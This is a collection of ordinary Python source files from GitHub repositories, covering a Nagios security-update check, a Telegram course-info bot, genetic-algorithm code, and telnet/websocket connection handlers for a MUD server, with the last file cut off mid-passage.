+{"seq_id":"20788547555","text":"'''\nAs the name suggests, the main function. Initializes the model, controller, and view.\nMain then launches the view which in this case is a text gui.\n'''\n\nfrom .model.model import Model\nfrom .controller.controller import Controller\nfrom .view.view import View\nfrom .misc import Misc\n\ndef main(address_space, requirements=None):\n _mod = Model(address_space) #sending address block to model\n ctrl = Controller(_mod)\n view = View(ctrl)\n\n if(requirements != None): #checking if requirements argument was passed\n for name, hosts in requirements:\n ctrl.add_new_subnet(hosts, name, True)\n\n print()\n Misc.welcome_banner()\n view.text_gui.run()\n","repo_name":"notarobot767/IT384_subnet_project","sub_path":"subnet_package/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25133564609","text":"#!/usr/bin/env python3\n\"\"\" Nagios check for security updates\n\nRequirements\n Python >= 3.8\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see .\n\"\"\"\nimport argparse\nimport csv\nimport logging\nimport re\nimport sys\n\nfrom datetime import date, datetime, timedelta\nfrom subprocess import run, TimeoutExpired, PIPE\nfrom typing import Match, Union, Tuple\n\n__license__ = \"GPLv3\"\n__version__ = \"0.1\"\n\n# Nagios return codes: https://nagios-plugins.org/doc/guidelines.html#AEN78\nOK = 0\nWARNING = 1\nCRITICAL = 2\nUNKNOWN = 3\nreturn_codes = ['OK', 'WARNING', 'CRITICAL', 'UNKNOWN']\nDEBUG = False\n\n# Global logging object\nlogger = logging.getLogger(__name__)\n\n\ndef parseargs() -> argparse.Namespace:\n \"\"\" Parse command-line arguments \"\"\"\n parser = argparse.ArgumentParser(description='Nagios check for security updates')\n parser.add_argument(\n '-v', '--verbose', required=False,\n help='enable verbose output', dest='verbose',\n action='store_true')\n parser.add_argument(\n '-d', '--debug', required=False,\n help='enable debug output', dest='debug',\n action='store_true')\n parser.add_argument(\n '-k', '--kernel', required=False,\n help='ommit kernel patches (if kernel live patches are enabled)', dest='nokernel',\n action='store_true')\n parser.add_argument(\n '-c', '--cache', required=False, default='/tmp/check-security-updates.cache',\n help='local cache file for patch dates (default: /tmp/check-security-updates.cache)', dest='cache',\n action='store_true')\n parser.add_argument('-V', '--version', action='version', version='%(prog)s ' + __version__)\n\n args = parser.parse_args()\n return args\n\n\nclass Firmware:\n def __init__(self, model:str = \"Dell\", servicetag = \"\"):\n self.model = model\n self.servicetag = servicetag\n\n # Local firmware versions\n self.bios_version = \"\"\n self.bmc_version = \"\"\n self.lifecycle_version = \"\"\n\n # Available firmware versions online\n self.bios_online = []\n self.bmc_online = []\n self.lifecycle_online = []\n\n def get_localfw(self):\n \"\"\"Retrieve list of local firmware versions currently installed on the system\"\"\"\n pass\n\n def get_onlinefw(self) -> bool:\n \"\"\"Retrieve list of available firmware versions online\"\"\"\n urls = {\"Dell\": \"\"}\n\n if self.servicetag == \"\":\n return False\n\n def check(self) -> bool:\n \"\"\"Compare local to online firmware\"\"\"\n pass\n\n\nclass Updates:\n def __init__(self, cache_file:str, nokernel: bool=False):\n self.rc = -1\n self.critical = {}\n self.important = {}\n self.moderate = {}\n self.low = {}\n self.cache_file = cache_file\n self.nokernel = nokernel\n self.next_patchdate = None\n self.expired = False\n\n def run(self, cmd: list, verbose: bool=False):\n \"\"\"List security updates and return result\"\"\"\n output = \"\"\n\n try:\n logger.debug(f'Running OS command line: {cmd} ...')\n process = run(cmd, check=True, timeout=60, stdout=PIPE)\n self.rc = process.returncode\n output = 
process.stdout.decode('utf-8').splitlines()\n except (TimeoutExpired, ValueError) as e:\n logger.warning(f'{e}')\n sys.exit(UNKNOWN)\n except FileNotFoundError as e:\n logger.critical(f\"CRITICAL: Missing program {cmd[0] if len(cmd) > 0 else ''} ({e})\")\n sys.exit(CRITICAL)\n except Exception as e:\n logger.critical(f'CRITICAL: {e}')\n sys.exit(CRITICAL)\n\n for line in output:\n expiration_date = None\n expired = None\n\n # Omit kernel patches\n m = re.search(r\"/Sec.\\s*(kernel.*)\", line)\n if m and self.nokernel:\n if verbose:\n logger.info(f\"Skipping {m.group(1)}\")\n continue\n\n # Always warn about these packages\n pkgs = \"(firefox.*|chrom.*)\"\n m = re.search(f\"\\s*{pkgs}\", line)\n if m:\n logger.debug(line)\n self.critical[\"Critical/Sec. \" + m.group(0).strip()] = datetime.today().strftime(\"%Y-%m-%d\")\n continue\n\n # Critical patches\n m = re.search(r\"Critical/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 30)\n logger.debug(line)\n self.critical[m.group(0)] = expiration_date\n\n # Important patches\n m = re.search(r\"Important/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.important[m.group(0)] = expiration_date\n\n # Moderate patches\n m = re.search(r\"Moderate/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.moderate[m.group(0)] = expiration_date\n\n # Low patches\n m = re.search(r\"Low/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.low[m.group(0)] = expiration_date\n\n if expired:\n self.expired = True\n\n if expiration_date:\n if not self.next_patchdate:\n self.next_patchdate = expiration_date\n else:\n if self.next_patchdate > expiration_date:\n self.next_patchdate = expiration_date\n\n if verbose:\n # Critical\n for patch_name, expiration_date in sorted(self.critical.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Important\n for patch_name, expiration_date in sorted(self.important.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Medium\n for patch_name, expiration_date in sorted(self.moderate.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Low\n for patch_name, expiration_date in sorted(self.low.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n\n logger.info(f\"Next patch date: {self.next_patchdate}\")\n\n def create_output(self) -> Tuple[int, str]:\n \"\"\"Verify result and return output in Nagios format\"\"\"\n if self.rc >= 0:\n result = OK\n else:\n return UNKNOWN, f'{return_codes[UNKNOWN]}'\n\n if self.expired and (len(self.important) > 0 or len(self.moderate) > 0 or len(self.low) > 0):\n result = WARNING\n if len(self.critical) > 0:\n result = CRITICAL\n\n msg = f'{return_codes[result]}: 
Critical={len(self.critical)} Important={len(self.important)} ' \\\n f'Moderate={len(self.moderate)} Low={len(self.low)} next_patch_date={self.next_patchdate}'\n perfdata = f'Critical={len(self.critical)};' \\\n f'Important={len(self.important)};' \\\n f'Moderate={len(self.moderate)};' \\\n f'Low={len(self.low)};'\n\n message = f'{msg}|{perfdata}'\n logger.debug(message)\n return result, message\n\n def check_expired(self, line:str, days_limit: int) -> Tuple[bool, Union[datetime.date,None]]:\n \"\"\"Check if time frame for update has expired\"\"\"\n output = \"\"\n expiration_date = None\n\n m = re.match(r\"([^\\s]+)\\s\", line)\n if m:\n logger.debug(f\"{line}\")\n patch = m.group(0).strip()\n\n # Check if patch is already in local cache\n is_cached, patch_date = self.check_cache(patch)\n if is_cached:\n logger.debug(f\"Local cache: {patch} {patch_date}\")\n else:\n # Retrieve patch info online\n cmd = [\"yum\", \"updateinfo\", \"info\", f\"{patch}\"]\n try:\n logger.debug(f'Running OS command line: {cmd} ...')\n process = run(cmd, check=True, timeout=60, stdout=PIPE)\n self.rc = process.returncode\n output = process.stdout.decode('utf-8').splitlines()\n except (TimeoutExpired, ValueError) as e:\n logger.warning(f'{e}')\n sys.exit(UNKNOWN)\n except FileNotFoundError as e:\n logger.critical(f\"CRITICAL: Missing program {cmd[0] if len(cmd) > 0 else ''} ({e})\")\n sys.exit(CRITICAL)\n except Exception as e:\n logger.critical(f'CRITICAL: {e}')\n sys.exit(CRITICAL)\n \n # Write patch date to cache file\n m2 = None\n for info_line in output:\n #logger.debug(f\"{info_line}\")\n m2 = re.match(r\"\\s*(Updated|Issued)\\s*:\\s*(\\d+-\\d+-\\d+ \\d+:\\d+:\\d+)\", info_line)\n if m2:\n patch_date = datetime.strptime(m2.group(2), \"%Y-%m-%d %H:%M:%S\").date()\n if self.update_cache(patch, patch_date):\n logger.debug(f\"Local cache updated: {patch} {patch_date}\")\n break\n\n if m2 is None:\n if self.update_cache(patch, None):\n logger.debug(f\"Local cache updated: {patch} None\")\n\n # Calculate expiration date after which patch has to be installed\n if patch_date is not None:\n expiration_date = patch_date + timedelta(days_limit)\n if date.today() >= expiration_date:\n logger.debug(f\"Timeframe to patch has expired: {expiration_date} (more than {days_limit} days ago)\")\n return True, expiration_date\n else:\n logger.debug(f\"patch_date={patch_date} days_limit={days_limit} (patch before {patch_date + timedelta(days_limit)})\")\n else:\n logger.error(f\"Patch line has wrong format: {line}\")\n\n return False, expiration_date\n\n def check_cache(self, patch:str) -> Tuple[bool, Union[datetime.date, None]]:\n '''Check local cache for patch release date'''\n try:\n with open(self.cache_file) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if row[0] == patch:\n if row[1] != \"None\":\n return (True, datetime.strptime(row[1], \"%Y-%m-%d\").date())\n else:\n return (True, None)\n except Exception:\n pass\n\n return (False, None)\n\n def update_cache(self, patch:str, patch_date: Union[datetime.date, None]) -> bool:\n '''Insert patch release date in local cache'''\n patch_date_str = patch_date.strftime(\"%Y-%m-%d\") if patch_date else \"None\"\n\n try:\n with open(self.cache_file, mode='a') as csv_file:\n patch_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n patch_writer.writerow([patch, patch_date_str])\n except Exception as e:\n logger.error(f\"Error writing cache file {self.cache_file}: {e}\")\n return False\n\n return 
True\n\n def clean_cache(self) -> bool:\n '''Delete patch information from cache file that is older than 1 year'''\n patches = {}\n\n # Read cache file\n try:\n with open(self.cache_file) as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',', fieldnames=['patch_name', 'patch_date'])\n for row in csv_reader:\n patches[row['patch_name']] = row['patch_date']\n except Exception as e:\n logger.error(f\"Read error while cleaning cache file {self.cache_file}: {e}\")\n return False\n\n # Write new cache file, sorted by patch date (newest first)\n # Patches older than 1 year are ignored\n try:\n with open(self.cache_file, mode='w') as csv_file:\n patch_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for patch_name, patch_date in sorted(patches.items(), key=lambda kv: kv[1] if kv[1] is not None else datetime.today().date(), reverse=True):\n try:\n dx = datetime.today() - datetime.strptime(patch_date, \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n dx = timedelta(0)\n\n if dx.days < 365:\n patch_writer.writerow([patch_name, patch_date])\n else:\n logger.debug(f\"Removing from cache file: {patch_name} {patch_date}\")\n except Exception as e:\n logger.error(f\"Write error while cleaning cache file {self.cache_file}: {e}\")\n return False\n\n return True\n\n\nclass LogFilterWarning(logging.Filter):\n \"\"\"Logging filter >= WARNING\"\"\"\n def filter(self, record):\n return record.levelno in (logging.DEBUG, logging.INFO, logging.WARNING)\n\n\ndef get_logger(debug: bool = False) -> logging.Logger:\n \"\"\"Retrieve logging object\"\"\"\n if debug:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.INFO)\n\n # Log everything >= WARNING to stdout\n h1 = logging.StreamHandler(sys.stdout)\n h1.setLevel(logging.DEBUG)\n h1.setFormatter(logging.Formatter(fmt='%(asctime)s [%(process)d] %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'))\n h1.addFilter(LogFilterWarning())\n\n # Log errors to stderr\n h2 = logging.StreamHandler(sys.stderr)\n h2.setFormatter(logging.Formatter(fmt='%(asctime)s [%(process)d] %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'))\n h2.setLevel(logging.ERROR)\n\n logger.addHandler(h1)\n logger.addHandler(h2)\n\n return logger\n\n\ndef main():\n \"\"\"Main program flow\"\"\"\n result = OK\n\n args = parseargs()\n get_logger(args.debug)\n\n # Retrieve list of available Linux updates\n updates = Updates(args.cache, True if args.nokernel else False)\n updates.run(['yum', 'updateinfo', 'list'], args.verbose)\n result, message = updates.create_output()\n print(message)\n\n # Clean old entries from cache file\n updates.clean_cache()\n\n exit(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"groland11/nagios-check-security-updates","sub_path":"check-security-updates.py","file_name":"check-security-updates.py","file_ext":"py","file_size_in_byte":16044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"500949594","text":"from ga_machine import *\n\n# UNBOUND KNAPSACK\n\n\nGA3 = GA(pop_size=500, mutation_rate=0.1, fit=knap_fitness, gene_factory=knap_gene_factory, indiv_factory=knap_individual_factory,\n termination_condition=lambda i: i == 10, number_of_genes=KNAP_NUMBER_OF_GENES, is_crossover=True)\npop, list_fitness = GA3.run()\n\n# Plot best, worst and average fitness per epoch\nplt.figure()\nepochs = list(range(1, GA3.generations() + 1))\nplt.plot(epochs, GA3.get_best_fitness())\nplt.plot(epochs, GA3.get_worst_fitness())\nplt.plot(epochs, GA3.get_average_fitness())\nplt.title('Fitness per epoch')\nplt.xlabel('Epoch number')\nplt.ylabel('Fitness')\nplt.legend(('Best Fitness', 'Worst Fitness', 'Average Fitness'))\nplt.savefig('Genetic Algorithms Problems/fitness.png')","repo_name":"tami2293/CC5114","sub_path":"Genetic Algorithms Problems/fitness_plot.py","file_name":"fitness_plot.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39203168445","text":"#!/usr/bin/env python3\n\nimport os,sys\n# append base path to sys.path\nrunpath = os.path.dirname(os.path.realpath(__file__))\napproot = os.path.abspath(os.path.join(runpath, os.pardir))\nsys.path.append(os.path.join(runpath,'..'))\nsys.path.append(approot)\nimport lib.shm as shm\n\n\nclass RunModule():\n def __init__(self,module_name):\n self.name = module_name\n self.module = self.__get_module()\n def __get_module(self):\n for m in shm.loaded_modules:\n if m.module_id == self.name:\n return m\n def run(self,args=''):\n if self.module:\n return self.module.run(args)","repo_name":"IsaPeter/PythonProjects","sub_path":"phoenix/lib/phoenixlibs.py","file_name":"phoenixlibs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37403865232","text":"#!/usr/bin/env python\n# This program is dedicated to the public domain under the CC0 license.\n# pylint: disable=import-error,wrong-import-position\n\"\"\"\nSimple example of a bot that uses a custom webhook setup and handles custom updates.\nFor the custom webhook setup, the libraries `starlette` and `uvicorn` are used. Please install\nthem as `pip install starlette~=0.20.0 uvicorn~=0.17.0`.\nNote that any other `asyncio` based web server framework can be used for a custom webhook setup\njust as well.\n\nUsage:\nSet bot token, url, admin chat_id and port at the start of the `main` function.\nYou may also need to change the `listen` value in the uvicorn configuration to match your setup.\nPress Ctrl-C on the command line or send a signal to the process to stop the bot.\n\"\"\"\nimport asyncio\nimport logging\nfrom dataclasses import dataclass\nfrom http import HTTPStatus\nimport os\n\nimport uvicorn\nfrom starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import PlainTextResponse, Response\nfrom starlette.routing import Route\n\nfrom telegram import __version__ as TG_VER\nfrom get_exam_schedule import get_exam_schedule\ntry:\n from telegram import __version_info__\nexcept ImportError:\n __version_info__ = (0, 0, 0, 0, 0) # type: ignore[assignment]\n\nif __version_info__ < (20, 0, 0, \"alpha\", 1):\n raise RuntimeError(\n f\"This example is not compatible with your current PTB version {TG_VER}. To view the \"\n f\"{TG_VER} version of this example, \"\n f\"visit https://docs.python-telegram-bot.org/en/v{TG_VER}/examples.html\"\n )\n\nfrom telegram import Update\nfrom telegram.constants import ParseMode\nfrom telegram.ext import (\n Application,\n CallbackContext,\n MessageHandler,\n filters,\n ContextTypes,\n ExtBot,\n)\n\n# Enable logging\nlogging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\", level=logging.INFO\n)\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass WebhookUpdate:\n \"\"\"Simple dataclass to wrap a custom update type\"\"\"\n\n user_id: int\n payload: str\n\n\nclass CustomContext(CallbackContext[ExtBot, dict, dict, dict]):\n \"\"\"\n Custom CallbackContext class that makes `user_data` available for updates of type\n `WebhookUpdate`.\n \"\"\"\n\n @classmethod\n def from_update(\n cls,\n update: object,\n application: \"Application\",\n ) -> \"CustomContext\":\n if isinstance(update, WebhookUpdate):\n return cls(application=application, user_id=update.user_id)\n return super().from_update(update, application)\n\n\nasync def driveFolders(update: Update, context):\n await update.message.reply_text(text=\"\"\"درايفات الطلاب: \\n\n\tدفعة 16 \\n\n\tدفعة 17 \\n\n\tدفعة 18 \\n\n\tدفعة 19 \\n\n\tدفعة 20 (مافيا) \\n\n\tدفعة 21 \\n\"\"\",parse_mode=ParseMode.HTML)\n\n\nasync def channels(update: Update, context):\n await update.message.reply_text(text=\"\"\"القنوات المتاحة: \\n\n قنوات علوم الحاسبات \\n\n قنوات تقنية المعلومات \\n\n قنوات نظم المعلومات \\n\n قنوات المواد المشتركة \\n\n بنك المعلومات الطلابي FCIT \\n\n قروب MAFIA 20 ، (مناقشة أو إستفسار تعال هنا): \\n\"\"\",parse_mode=ParseMode.HTML)\n\nasync def avaliableCommands(update: Update, context):\n await update.message.reply_text(\"\"\"الأوامر المتاحة: \\n\n 1- درايف \\n\n 2- قنوات \\n\n 3- بوت20 \\n\n 4- discord\"\"\")\n\n\nasync def discordServer(update: Update, context):\n await update.message.reply_text(\"Programmers of KAU \", parse_mode= ParseMode.HTML)\n\n\n## exam schedule\n\n\nasync def 
getCourseInfo(update: Update, context):\n message = update.message\n text = message.text.split()[1]\n course = data_list.get(text.upper())\n if course:\n await update.message.reply_text(\"Course: \"+text+\"\\nStudents: \"+course[0]+\"\\nLocation: \"+course[1]+\"\\nTime: \"+course[2]+\"\\ndate: \"+course[3])\n\n\n\n\nasync def main() -> None:\n global data_list\n \"\"\"Set up the application and a custom webserver.\"\"\"\n port = int(os.environ.get('PORT', 5000))\n token = os.environ.get('TOKEN')\n url = os.environ.get('WEBHOOK_URL')\n exam_url = os.environ.get('exam_url')\n admin_chat_id = os.environ.get('admin_chat_id')\n\n data_list = get_exam_schedule(exam_url)\n\n \n context_types = ContextTypes(context=CustomContext)\n # Here we set updater to None because we want our custom webhook server to handle the updates\n # and hence we don't need an Updater instance\n application = (\n Application.builder().token(token).updater(None).context_types(context_types).build()\n )\n # save the values in `bot_data` such that we may easily access them in the callbacks\n application.bot_data[\"url\"] = url\n application.bot_data[\"admin_chat_id\"] = admin_chat_id\n\n # register handlers\n #application.add_handler(CommandHandler(\"start\", start))\n #application.add_handler(TypeHandler(type=WebhookUpdate, callback=webhook_update))\n \n application.add_handler(MessageHandler(filters.Text([\"درايف\"]), driveFolders))\n application.add_handler(MessageHandler(filters.Text([\"قنوات\"]), channels))\n application.add_handler(MessageHandler(filters.Text([\"بوت20\"]), avaliableCommands))\n application.add_handler(MessageHandler(filters.Text([\"discord\"]), discordServer))\n\n # Exam schedule \n \n application.add_handler(MessageHandler(filters.Regex(r'موعد (?:cpcs|CPCS|cpit|CPIT|cpis|CPIS)-\\d{3}'), getCourseInfo))\n \n\n # Pass webhook settings to telegram\n await application.bot.set_webhook(url=f\"{url}/telegram\")\n\n # Set up webserver\n async def telegram(request: Request) -> Response:\n \"\"\"Handle incoming Telegram updates by putting them into the `update_queue`\"\"\"\n await application.update_queue.put(\n Update.de_json(data=await request.json(), bot=application.bot)\n )\n \n return Response()\n\n async def health(_: Request) -> PlainTextResponse:\n \"\"\"For the health endpoint, reply with a simple plain text message.\"\"\"\n return PlainTextResponse(content=\"The bot is still running fine :)\")\n\n starlette_app = Starlette(\n routes=[\n Route(\"/telegram\", telegram, methods=[\"POST\"]),\n Route(\"/healthcheck\", health, methods=[\"GET\"]),\n ]\n )\n webserver = uvicorn.Server(\n config=uvicorn.Config(\n app=starlette_app,\n port=port,\n use_colors=False,\n host=\"0.0.0.0\",\n )\n )\n\n # Run application and webserver together\n async with application:\n await application.start()\n await webserver.serve()\n await application.stop()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"KhaledMAlasmari/FCIT20Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16154005663","text":"# Briar Doty\n# Nov 2013\n# GeneticAlg.py\n# Genetic algorithm trains Neural network\n\nimport random\nimport Common\n\nclass Chromosome:\n\n\t# Input:\n\t#\t\tweights - vector of weights associated with this chromosome\n\t#\t\tfitness - optional value represents fitness of associated genome\n\t# Output:\n\t#\t\tNone\n\t# Description:\n\t#\t\tConstructor for Chromosome objects\n\tdef __init__(self, weights, fitness=0):\n\t\tself.weights = weights\n\t\tself.fitness = fitness\n\t\t\n\tdef __eq__(self, other):\n\t\treturn self.fitness == other.fitness\n\t\t\n\tdef __lt__(self, other):\n\t\treturn self.fitness > other.fitness\n\t\t\nclass GenAlg:\n\n\t# Input:\n\t# popSize - number of Chromosomes in population\n\t# mutRate - probability a weight will mutate in a single epoch\n\t# crossRate - probability two chromosomes will cross over in single epoch\n\t# numWeight - total number of weights in NN each Chromosome represents\n\t# Output:\n\t#\t\tNone\n\t# Description:\n\t# Initializes state necessary to evolve population of NNs using genetic alg\n\tdef __init__(self, popSize, mutRate, crossRate, numWeight):\n\t\tself.popSize = popSize\n\t\tself.mutRate = mutRate\n\t\tself.crossRate = crossRate\n\t\tself.numWeight = numWeight\n\t\t\n\t# Input:\n\t# c - chromosome to mutate\n\t# Output:\n\t#\t\tmutated chromosome\n\t# Description:\n\t#\t\tPerturb chromosome weights depending on mutation rate\n\tdef mutate(self, c):\n\t\t# traverse chromosome and mutate weights depending on rate\n\t\tfor i in range(len(c.weights)):\n\t\t\tif (random.uniform(0, 1) < self.mutRate): # mutate this weight\n\t\t\t\tc.weights[i] += random.uniform(-1, 1) * Common.maxPerturbation\n\t\t\n\t# Input:\n\t# \t\tc1, c2 - chromosomes to cross over\n\t# Output:\n\t#\t\ttuple containing resulting chromosomes\n\t# Description:\n\t#\t\tSwitch gene segments between 2 given chromosomes based on crossover rate\n\tdef crossover(self, c1, c2):\n\t\tif (random.uniform(0, 1) > self.crossRate or c1.weights == c2.weights): # no crossover\n\t\t\treturn (c1, c2)\n\n\t\t# index of crossover\n\t\tcrossPoint = random.randint(0, self.numWeight - 1)\n\t\t\n\t\t# create offspring\n\t\tr1 = Chromosome(c1.weights[:crossPoint] + c2.weights[crossPoint:])\n\t\tr2 = Chromosome(c2.weights[:crossPoint] + c1.weights[crossPoint:])\n\t\t\n\t\treturn (r1, r2)\n\t\n\t# Input:\n\t#\t\tpopulation - vector of chromosomes representing population of NNs\n\t# Output:\n\t#\t\tan evolved population, new generation\n\t# Description:\n\t#\t\tEvolves the given population one generation\n\tdef evolve(self, population):\n\t\tresult = []\n\t\t\n\t\t# sort population according to fitness\n\t\tpopulation.sort()\n\t\t\n\t\t# increase frequency of fittest chromosomes in population\n\t\tpopulation = self.replicateFittest(Common.numElite, Common.numCopiesElite, population)\n\t\t\n\t\t# main GA loop\n\t\twhile (len(result) < self.popSize):\n\t\t\t# pick 2 chromosomes to alter\n\t\t\tc1 = random.choice(population)\n\t\t\tc2 = random.choice(population)\n\t\t\t\n\t\t\t(c3, c4) = self.crossover(c1, c2)\n\t\t\t\n\t\t\tself.mutate(c3)\n\t\t\tself.mutate(c4)\n\t\t\t\n\t\t\t# add to result new generation\n\t\t\tresult.append(Chromosome(c3.weights))\n\t\t\tresult.append(Chromosome(c4.weights))\n\t\t\n\t\treturn result\n\t\t\n\t# Input:\n\t#\t\tnFittest - number of top-ranked chromosomes to replicate\n\t#\t\tnCopies - number copies of chromosomes to make\n\t#\t\tpopulation - vector of chromosomes representing population of NNs\n\t# Output:\n\t#\t\ta population 
with increased number of fit chromosomes\n\t# Description:\n\t#\t\tIncreases the frequency of the fittest chromosomes\n\tdef replicateFittest(self, nFittest, nCopies, population):\n\t\t# take nFittest chromosomes and copy them nCopies times\n\t\tfittest = population[:nFittest]\n\t\tresult = population + nCopies * fittest\n\t\t\n\t\treturn result\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t","repo_name":"briardoty/NeuralUI","sub_path":"GeneticAlg.py","file_name":"GeneticAlg.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30199144023","text":"import re\nimport hashlib\nfrom struct import pack\nfrom socket import error as socket_error\n\nclass ShinyConnection(object):\n \n def __init__(self, conn_info, log):\n self.conn, self.addr = conn_info\n self.log = log\n \n def send(self):\n pass\n \n def recv(self):\n pass\n\n\nclass TelnetConnection(ShinyConnection):\n \n win_change_regexp = re.compile(r\"\\xff\\xfa\\x1f(?P.*?)\\xff\\xf0\")\n \n def __init__(self, conn_info, log):\n ShinyConnection.__init__(self, conn_info, log)\n self.win_size = (80,40)\n self.set_telnet_options()\n # Put our socket into non-blocking mode - we'll periodically poll for data\n # instead of blocking until we get it\n self.conn.setblocking(0)\n \n def send(self, queue):\n try:\n for index, line in enumerate(queue):\n if index != (len(queue) - 1):\n line += '\\r\\n'\n self.conn.send(line)\n del queue[:]\n except socket_error:\n # If we die here, it's probably because we got a broken pipe...\n # tell the function that's calling us we're not alive anymore\n return False\n else:\n return True\n \n def recv(self):\n try:\n new_stuff = self.conn.recv(256)\n except socket_error:\n # In non-blocking mode, recv generates an error if it doesn't find\n # any data to recieve. We want to ignore that error and quitely wait until\n # there is data.\n return False\n else:\n # Get rid of the \\r \\n line terminators\n new_stuff = new_stuff.replace('\\n', '').replace('\\r', '')\n # See if the input is a notice of window size change\n self.parse_winchange(new_stuff)\n # Ignore any other telnet negotiations\n new_stuff = re.sub(r\"\\xff((\\xfa.*?\\xf0)|(..))\", '', new_stuff)\n if new_stuff:\n return new_stuff\n return False\n \n \n def close(self):\n self.conn.close()\n \n def set_telnet_options(self):\n \"\"\"Petition client to run in linemode and to send window size change\n notifications.\n Some telnet clients, such as putty, start in non-linemode by default\n (they transmit each character as they receive it from the player). We want\n them to switch to linemode in this case, where they transmit each line\n after it's been assembled. We also wan't the client to tell us their\n screen size so we can display things appropriately.\n \"\"\"\n # IAC + WILL + LINEMODE\n self.conn.send(chr(255) + chr(251) + chr(34) + '\\r\\n')\n # We should get a response from their client (immediately)\n self.conn.settimeout(1.0)\n try:\n result = list(self.conn.recv(256))\n except socket.timeout:\n # This just means that their telnet client didn't send us a timely\n # response to our initiating linemode... we should just move on\n result = 'Client response FAIL for linemode.'\n finally:\n self.log.debug(result)\n \n # IAC DO NAWS (Negotiate About Window Size)\n self.conn.send(chr(255) + chr(253) + chr(31) + '\\r\\n')\n try:\n result = list(self.conn.recv(256))\n except:\n result = 'Client response FAIL for NAWS.'\n else:\n # IAC WILL NAWS\n if result[0:3] == ['\\xff', '\\xfb', '\\x1f']:\n # win, they're willing to do NAWS! 
Parse their window info\n stuff = ''.join(result[3:])\n self.parse_winchange(stuff)\n finally:\n self.conn.settimeout(None)\n self.log.debug(str(result))\n \n def parse_winchange(self, data):\n \"\"\"Parse and set the terminal size of the player.\"\"\"\n match = self.win_change_regexp.match(data)\n if match:\n size = match.group('size')\n self.win_size = (ord(size[1]), ord(size[3]))\n \n\n\nclass WebsocketConnection(ShinyConnection):\n handshake_string = \"HTTP/1.1 101 Web Socket Protocol Handshake\\r\\n\\\nUpgrade: WebSocket\\r\\n\\\nConnection: Upgrade\\r\\n\\\nSec-WebSocket-Origin: %(origin)s\\r\\n\\\nSec-WebSocket-Location: ws://%(host)s/\\r\\n\\r\\n\"\n \n def __init__(self, conn_info, log, host, port):\n ShinyConnection.__init__(self, conn_info, log)\n self.host = host\n self.port = port\n self.data_fragment = ''\n self.handshake()\n self.conn.setblocking(0)\n \n def send(self, queue):\n try:\n while (len(queue) > 0):\n line = queue.pop(0)\n line = '\\x00' + line.encode('utf-8') + '\\xFF'\n self.conn.send(line)\n except socket_error:\n # If we die here, it's probably because we got a broken pipe...\n # tell the function that's calling us we're not alive anymore \n return False\n else:\n return True\n \n \n def recv(self):\n try:\n new_stuff = self.data_fragment + self.conn.recv(256)\n except socket_error:\n # In non-blocking mode, recv generates an error if it doesn't find\n # any data to recieve. We want to ignore that error and quitely wait until\n # there is data.\n return False\n else:\n valid_lines = []\n \n # Split all lines on the terminating character\n lines = new_stuff.split('\\xFF')\n \n # Pop the last line off of the end - this will either be an empty string if the\n # last line was terminated, or a left over fragment that should wait for the next batch\n # of lines to be processed\n self.data_fragment = lines.pop()\n \n # Now we should make sure the lines have a 